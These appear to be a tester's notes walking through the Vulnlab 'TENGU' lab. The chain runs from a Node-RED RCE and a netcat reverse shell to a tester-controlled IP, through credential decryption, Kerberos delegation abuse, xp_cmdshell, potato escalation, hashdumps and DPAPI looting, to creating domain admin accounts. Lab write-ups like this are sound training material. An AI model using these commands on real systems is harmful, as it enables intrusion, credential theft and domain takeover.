Here is my notes on TENGU box from Vulnlab.
TENGU:
DC.TENGU.VL: 10.10.174.149
No Kerberoasting so don't bother !
#Only if pivoting with chisel and have t2_m.winters.
proxychains4 bloodhound-python -c All -u t2_m.winters -p Tengu123 -d tengu.vl --dns-tcp -ns 10.10.183.101
BLOODHOUND DATA:
NODERED$ -> Member of -> LINUX_SERVER@TENGU.VL Group -> ReadGMSAPassword -> GMSA01@TENGU.VL User.
NODERED - Require Root:
root@nodered:~# python3 keytabextract.py /etc/krb5.keytab
python3 keytabextract.py /etc/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : TENGU.VL
SERVICE PRINCIPAL : NODERED$/
NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
proxychains4 crackmapexec ldap 10.10.183.101 -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa
SMB 10.10.183.101 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... DC.tengu.vl:636 ... OK
LDAP 10.10.183.101 636 DC [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49
LDAP 10.10.183.101 636 DC [*] Getting GMSA Passwords
LDAP 10.10.183.101 636 DC Account: gMSA01$ NTLM: 20e3021a743b059d150adf19e1a00db8
Silver-Ticket Example: #TENGU-VL
gMSA01$@TENGU.VL User -> AllowedToDelegate -> SQL_ADMINS@TENGU.VL
or
gMSA01$@TENGU.VL User -> AllowedToDelegate -> SQL.TENGU.VL
t2_m.winters -> Member Of -> SQL_ADMINS@TENGU
AllowedToDelegate:
MSSQLSvc/SQL:1433
MSSQLSvc/sql.tengu.vl:1433
MSSQLSvc/sql.tengu.vl
MSSQLSvc/sql
We may cannot use silver ticket for administrator but we can do it to t2_m.winters since it's a member of SQL-ADMINS and it didn' work in the first place is because it's in low priv.
So with GMSA01, we can make it happen to t2_m.winters user to gain xp_cmdshell as GMSA01 sessions for SQL target.
SPN:
MSSQLSvc/SQL.tengu.vl:1433
MSSQLSvc/SQL.tengu.vl
getST.py -spn 'MSSQLSvc/SQL.tengu.vl' -impersonate 't2_m.winters' -altservice 'mssql' -hashes :20e3021a743b059d150adf19e1a00db8 'tengu.vl/GMSA01$'
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# sudo proxychains4 ntpdate 10.10.178.37
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
2024-11-11 14:07:29.794443 (-0500) -3229.692154 +/- 0.058561 10.10.178.37 s1 no-leap
CLOCK: time stepped by -3229.692154
proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' -impersonate 'T2_M.WINTERS' -hashes :20e3021a743b059d150adf19e1a00db8 'tengu.vl/gMSA01$'@sql.tengu.vl -dc-ip 10.10.183.101
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:88 ... OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:88 ... OK
[*] Saving ticket in T1_M.WINTERS@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# export KRB5CCNAME=/home/kali/VULNLAB/TENGU/T1_M.WINTERS@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# proxychains4 impacket-mssqlclient T1_M.WINTERS@sql.tengu.vl -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.38:1433 ... OK
[*] Encryption required, switching to TLS
[-] ERROR(SQL): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# sudo proxychains4 ntpdate 10.10.178.37
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
2024-11-11 14:07:55.938890 (-0500) -3229.214783 +/- 0.059359 10.10.178.37 s1 no-leap
CLOCK: time stepped by -3229.214783
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# proxychains4 impacket-mssqlclient T1_M.WINTERS@sql.tengu.vl -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.38:1433 ... OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters dbo@master)>
Silver-Ticket Troubleshooting:
1) ntpdate to DC
2) Create a silver ticket to DC01.
3) Export or use it.
4) ntpdate to DC.
5) then run the service with the ticket.
If that don't work then repeat the 5 steps until it works.
┌──(root㉿kali)-[/home/kali/VULNLAB/TENGU]
└─# proxychains4 mssqlclient.py T1_M.WINTERS@sql.tengu.vl -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.38:1433 ... OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters dbo@master)> enable_xp_cmdshell
[*] INFO(SQL): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(SQL): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (TENGU\t1_m.winters dbo@master)> xp_cmdshell "whoami"
output
-------------
tengu\gmsa01$
Turn it into a user-shell of SQL01 as usual.
TENGU\T0_c.fowler:UntrimmedDisplaceModify25
#From POST-EXPLOITATION of SQL.
proxychains4 crackmapexec smb 10.10.178.37 -u T0_c.fowler -p UntrimmedDisplaceModify25
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:135 ... OK
SMB 10.10.178.37 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.178.37:445 ... OK
SMB 10.10.178.37 445 DC [-] tengu.vl\T0_c.fowler:UntrimmedDisplaceModify25 STATUS_ACCOUNT_RESTRICTION
PS C:\Windows\system32> dir \\DC.TENGU.VL\C$
Directory: \\DC.TENGU.VL\C$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 3/25/2024 2:41 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 3/9/2024 10:52 AM Users
d----- 3/25/2024 2:49 AM Windows
PS C:\Windows\system32> dir \\DC.TENGU.VL\C$\Users\Administrator\Desktop
Directory: \\DC.TENGU.VL\C$\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/11/2024 6:39 AM 37 root.txt
PS C:\Windows\system32> type \\DC.TENGU.VL\C$\Users\Administrator\Desktop\root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Nmap scan report for 10.10.174.149
Host is up, received user-set (0.12s latency).
Scanned at 2024-11-11 10:38:15 EST for 231s
Not shown: 714 closed tcp ports (reset), 285 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.tengu.vl
| Issuer: commonName=DC.tengu.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-10T14:45:14
SQL.TENGU.VL: 10.10.174.150
Nmap scan report for 10.10.174.150
Host is up, received user-set (0.12s latency).
Scanned at 2024-11-11 10:38:15 EST for 615s
Not shown: 669 filtered tcp ports (no-response), 330 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: TENGU
| NetBIOS_Domain_Name: TENGU
| NetBIOS_Computer_Name: SQL
| DNS_Domain_Name: tengu.vl
| DNS_Computer_Name: SQL.tengu.vl
| DNS_Tree_Name: tengu.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-11T14:54:37+00:00
| ssl-cert: Subject: commonName=SQL.tengu.vl
| Issuer: commonName=SQL.tengu.vl
| Public Key type: rsa
#Pivoting from NODERED to MSSQL Service with ligolo-ng:
impacket-mssqlclient nodered_connector:DreamPuppyOverall25@10.10.183.102 -windows-auth
nodered_connector:DreamPuppyOverall25
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/loot]
└─# proxychains4 impacket-mssqlclient nodered_connector:DreamPuppyOverall25@10.10.183.102
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.183.102:1433 ... OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: Dev
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'Dev'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (nodered_connector nodered_connector@Dev)>
-WORKS !
SELECT name FROM sys.databases;
select * from Demo.information_schema.tables;
select * from Demo.dbo.users;
SQL (nodered_connector nodered_connector@Demo)> SELECT name FROM sys.databases;
name
------
master
tempdb
model
msdb
Demo
Dev
SQL (nodered_connector nodered_connector@Demo)>
SQL (nodered_connector nodered_connector@Demo)> select * from Demo.dbo.users;
ID Username Password
---- --------------- -------------------------------------------------------------------
NULL b't2_m.winters' b'af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147'
t2_m.winters:af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147:Tengu123
Credential Discovered !
#FROM BLOODHOUND DATA on DC01:
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.178.38] 56838
Microsoft Windows [Version 10.0.20348.2340]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
tengu\gmsa01$
C:\Windows\system32>hostname
hostname
SQL
USER-SHELL !
PRIV ESC:
C:\>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
POTATO TIME !
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > shell
Process 1480 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.2340]
(c) Microsoft Corporation. All rights reserved.
C:\Users\gMSA01$>whoami
whoami
nt authority\system
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
SQL
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4263-77E2
Directory of C:\Users\Administrator\Desktop
03/11/2024 05:41 AM <DIR> .
03/09/2024 10:52 AM <DIR> ..
03/11/2024 05:41 AM 37 root.txt
1 File(s) 37 bytes
2 Dir(s) 6,604,091,392 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
POST-EXPLOITATION:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:73db3fdd24bee6eeb5aac7e17e4aba4c:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a4be65de5834374c1df6b157d6bf8d64:::
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t Reg_DWORD /d 1
proxychains4 donpapi collect --hashes :73db3fdd24bee6eeb5aac7e17e4aba4c -u administrator -t 10.10.178.38
[SNIP]
[10.10.178.38] [+] Dumping User and Machine masterkeys
[10.10.178.38] [$] [DPAPI] Got 5 masterkeys
[10.10.178.38] [+] Dumping User Chromium Browsers
[10.10.178.38] [+] Dumping User and Machine Certificates
[10.10.178.38] [+] Dumping User and Machine Credential Manager
[10.10.178.38] [$] [CredMan] [SYSTEM] Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2} - TENGU\T0_c.fowler:UntrimmedDisplaceModify25
[10.10.178.38] [+] Gathering recent files and desktop files
[10.10.178.38] [+] Dumping User Firefox Browser
[10.10.178.38] [+] Dumping MobaXterm credentials
[10.10.178.38] [+] Dumping MRemoteNg Passwords
[SNIP]
TENGU\T0_c.fowler:UntrimmedDisplaceModify25
net user T0_c.fowler /domain
The request will be processed at a domain controller for domain tengu.vl.
User name t0_c.fowler
Full Name T0_Colin Fowler
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/9/2024 12:04:33 PM
Password expires Never
Password changeable 3/10/2024 12:04:33 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 11/11/2024 10:36:04 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Admins *Protected Users
*Domain Users
The command completed successfully.
PS C:\> cd admin
cd admin
PS C:\admin> ls
ls
Directory: C:\admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/10/2024 2:50 PM 1433 Task.ps1
PS C:\admin> icacls Task.ps1
icacls Task.ps1
Task.ps1 NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
TENGU\T0_c.fowler:(I)(F)
Successfully processed 1 files; Failed processing 0 files
schtasks /query /v /fo LIST > tasklist.txt
HostName: SQL
TaskName: \Daily_Checkup
Next Run Time: 11/11/2024 2:41:59 PM
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 11/11/2024 10:36:04 AM
Last Result: -2147020576
Author: TENGU\T0_c.fowler
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -File C:\admin\Task.ps1
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: T0_c.fowler
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 2:41:59 PM
Start Date: 3/10/2024
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
net user offsec Start1231 /add
net localgroup administrators offsec /add
Modify Task.ps1 then force restart it with this command:
Get-ScheduledTask -TaskName "Daily_Checkup" | Start-ScheduledTask
sudo rlwrap nc -lnvp 5555
listening on [any] 5555 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.178.38] 58980
PS C:\Windows\system32> whoami
tengu\t0_c.fowler
PS C:\Windows\system32> hostname
SQL
PS C:\Windows\system32>
We are now in domain admin session so we add our own domain admin or local admin of DC01 instead.
PS C:\Windows\system32> net user pucks puck123! /add /domain
The request will be processed at a domain controller for domain tengu.vl.
The command completed successfully.
PS C:\Windows\system32> net localgroup Administrators pucks /add /domain
net user offsec offsec123!offsec /add /domain
net group "Domain Admins" offsec /add /domain
If that don't work then you can just grab root.txt flag in DC instead.
PS C:\Windows\system32> dir \\DC.TENGU.VL\C$
Directory: \\DC.TENGU.VL\C$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 3/25/2024 2:41 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 3/9/2024 10:52 AM Users
d----- 3/25/2024 2:49 AM Windows
PS C:\Windows\system32> dir \\DC.TENGU.VL\C$\Users\Administrator\Desktop
Directory: \\DC.TENGU.VL\C$\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/11/2024 6:39 AM 37 root.txt
PS C:\Windows\system32> type \\DC.TENGU.VL\C$\Users\Administrator\Desktop\root.txt
VL{6f106b09ff464e7ef0b36483e348dbc9}
NODERED: 10.10.174.151
Nmap scan report for 10.10.174.151
Host is up, received user-set (0.11s latency).
Scanned at 2024-11-11 10:38:15 EST for 840s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 86a2626584f4ec5ba8a8a38f83a39627 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL2hpU6weYtD62S/8lWglrpgVR1GLLqFIQbdV6/FDnmRNlpXO5yUq7Nfziu3FnxyAk7lTv0FlC9wtod6LQitly8=
| 256 41c7d428ecd85baa97eec0be3ce3aa73 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE22Ek7XHADfVvm3ESrxEr6Eif+lyyaEb8LfCO8Z3rP+
1880/tcp open vsat-control? syn-ack ttl 63
| fingerprint-strings:
| DNSVersionBindReqTCP, RPCCheck:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 200 OK
| Access-Control-Allow-Origin: *
| Content-Type: text/html; charset=utf-8
| Content-Length: 1736
| ETag: W/"6c8-alK4HUX6EE46WSbf+286KDcADEI"
-Node-RED website.
Node-Red Web Service NOTES: #TCP Port 1880
-Vulnerable to RCE.
https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/
https://gist.github.com/qkaiser/79459c3cb5ea6e658701c7d203a8c297/raw/8966e4ee07400f16b92737161ca8df3cbfa37f91/noderedsh.py
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/exploit]
└─# python3 exploit.py http://10.10.174.151:1880
[+] Node-RED does not require authentication.
[+] Establishing RCE link ....
> whoami
TypeError: results.foreach is not a function
/home/kali/VULNLAB/TENGU/results/10.10.174.151/exploit/exploit.py:271: RuntimeWarning: coroutine 'WebSocketCommonProtocol.close' was never awaited
websocket.close()
RuntimeWarning: Enable tracemalloc to get the object allocation traceback
>
nodered_svc
> id
TypeError: results.foreach is not a function
>
{"name":"TypeError","message":"The argument 'file' cannot be empty. Received ''"}
>
TypeError: results.foreach is not a function
>
uid=1001(nodered_svc) gid=1001(nodered_svc) groups=1001(nodered_svc)
> hostname
TypeError: results.foreach is not a function
>
{"name":"TypeError","message":"The argument 'file' cannot be empty. Received ''"}
>
TypeError: results.foreach is not a function
>
{"name":"TypeError","message":"The argument 'file' cannot be empty. Received ''"}
>
TypeError: results.foreach is not a function
>
{"name":"TypeError","message":"The argument 'file' cannot be empty. Received ''"}
>
TypeError: results.foreach is not a function
>
nodered
#Give a few seconds for the command to be executed.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.0.71 1234 >/tmp/f
┌──(root㉿kali)-[/home/kali/VULNLAB]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.174.151] 57694
bash: cannot set terminal process group (434): Inappropriate ioctl for device
bash: no job control in this shell
nodered_svc@nodered:/opt/nodered$ whoami
whoami
nodered_svc
nodered_svc@nodered:/opt/nodered$
USER-SHELL !
python3 -c 'import pty; pty.spawn("/bin/bash")'
PRIV ESC:
NO GCC.
NO Crontab.
NO /etc/cron.d.
NO SUID.
NO getcap binaries.
NO Kernel Exploit.
NO interesting /opt directory.
LINPEAS:
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/credentials
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/credentials/credentialPersistenceOptions.js
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/credentials/credentialPersistenceOptions.js.map
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/msal/credentials.js
/home/nodered_svc/.node-red/node_modules/@azure/identity/dist-esm/src/msal/credentials.js.map
#NOPE.
No Hidden Service.
No pspy64s.
nodered_svc@nodered:/opt/nodered$ cd .node-red
cd .node-red
nodered_svc@nodered:/opt/nodered/.node-red$ ls
ls
flows_cred.json
flows.json
lib
node_modules
package.json
package-lock.json
settings.js
nodered_svc@nodered:/opt/nodered/.node-red$ cat flows_cred.json
cat flows_cred.json
{
"$": "7f5ab122acc2c24df1250a302916c1a6QT2eBZTys+V0xdb7c6VbXMXw2wbn/Q3r/ZcthJlrvm3XLJ8lSxiq+FAWF0l3Bg9zMaNgsELXPXfbKbJPxtjkD9ju+WJrZBRq/O40hpJzWoKASeD+w2o="
}
nodered_svc@nodered:/opt/nodered/.node-red$ cat .flows_cred.json.backup
cat .flows_cred.json.backup
{
"$": "aaf1095c59f3e8923aaba94f9a334213FfcRfVk7nduziitg8IWJ7vGzrR+YDe+Z0LPlgvpOU3s74v6yHsR4mdwpum0l0WDzQ+1HMdRJLj3eavF93oKtSgYpxhp2/VCaE8k9R0isPQ5lvMdrw/rfVheFc6fYk5Da/+qnRm/9IM91Yw=="
}
None of these hashes works with nodered_svc user.
Node-Red Hash Decrypt:
node-cred-decrypt.sh Script:
#!/bin/bash
#
# Decrypt flows_cred.json from a NodeRED data directory
#
# Usage
# ./node-red-decrypt-flows-cred.sh ./node_red_data
#
jq '.["$"]' -j $1/flows_cred.json | \
cut -c 33- | \
openssl enc -aes-256-ctr -d -base64 -A -iv `jq -r '.["$"]' $1/flows_cred.json | cut -c 1-32` -K `jq -j '._credentialSecret' $1/.config.runtime.json | sha256sum | cut -c 1-64`
nodered_svc@nodered:/opt/nodered/.node-red$ cat flows_cred.json
cat flows_cred.json
{
"$": "7f5ab122acc2c24df1250a302916c1a6QT2eBZTys+V0xdb7c6VbXMXw2wbn/Q3r/ZcthJlrvm3XLJ8lSxiq+FAWF0l3Bg9zMaNgsELXPXfbKbJPxtjkD9ju+WJrZBRq/O40hpJzWoKASeD+w2o="
}
nodered_svc@nodered:/opt/nodered/.node-red$ cat .config.runtime.json
cat .config.runtime.json
{
"instanceId": "e8a268b474281aa4",
"_credentialSecret": "dee5c9fb0287ad39bac9f29bfe6f3adb4be9826f135eb6da91de0d013bd6799b"
}
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/exploit]
└─# ls -lah JUNK
total 16K
drwxr-xr-x 2 root root 4.0K Nov 11 12:39 .
drwxr-xr-x 3 root root 4.0K Nov 11 12:39 ..
-rw-r--r-- 1 root root 133 Nov 11 12:38 .config.runtime.json
-rw-r--r-- 1 root root 163 Nov 11 12:35 flows_cred.json
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/exploit]
└─# chmod +x node-cred-decrypt.sh
┌──(root㉿kali)-[/home/…/TENGU/results/10.10.174.151/exploit]
└─# ./node-cred-decrypt.sh ./JUNK/
{"d237b4c16a396b9e":{"username":"nodered_connector","password":"DreamPuppyOverall25"}}
https://blog.hugopoi.net/en/2021/12/28/how-to-decrypt-flows_cred-json-from-nodered-data/
https://dan-feliciano.com/2024/06/05/tengu/
nodered_connector:DreamPuppyOverall25
This credential can be use for MSSQL Service of SQL target. #Require Pivoting such with Ligolo-NG or chisel as usual.
./chisel server -p 53 --reverse
./chisel client --max-retry-count=1 10.8.0.71:53 R:1080:socks
t2_m.winters:af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147:Tengu123
#From mssql of SQL.
nodered_svc@nodered:/home/tengu.vl$ ls -lah
ls -lah
total 12K
drwxr-xr-x 3 root root 4,0K Mär 26 2024 .
drwxr-xr-x 5 root root 4,0K Mär 26 2024 ..
drwxr-xr-x 2 t2_m.winters@tengu.vl domain users@tengu.vl 4,0K Mär 26 2024 t2_m.winters
nodered_svc@nodered:/home/tengu.vl$ su - t2_m.winters@tengu.vl
su - t2_m.winters@tengu.vl
Password: Tengu123
t2_m.winters@tengu.vl@nodered:~$ whoami
whoami
t2_m.winters@tengu.vl
t2_m.winters@tengu.vl@nodered:~$ id
id
uid=1317801117(t2_m.winters@tengu.vl) gid=1317800513(domain users@tengu.vl) groups=1317800513(domain users@tengu.vl),1317801115(linux_server_admins@tengu.vl)
t2_m.winters@tengu.vl@nodered:~$ sudo -l
sudo -l
[sudo] password for t2_m.winters@tengu.vl: Tengu123
Matching Defaults entries for t2_m.winters@tengu.vl on nodered:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User t2_m.winters@tengu.vl may run the following commands on nodered:
(ALL : ALL) ALL
t2_m.winters@tengu.vl@nodered:~$ sudo su
sudo su
root@nodered:/home/tengu.vl/t2_m.winters# whoami
whoami
root
ROOT-SHELL !
root@nodered:~# whoami
whoami
root
root@nodered:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@nodered:~# pwd
pwd
/root
root@nodered:~# cat root.txt
cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}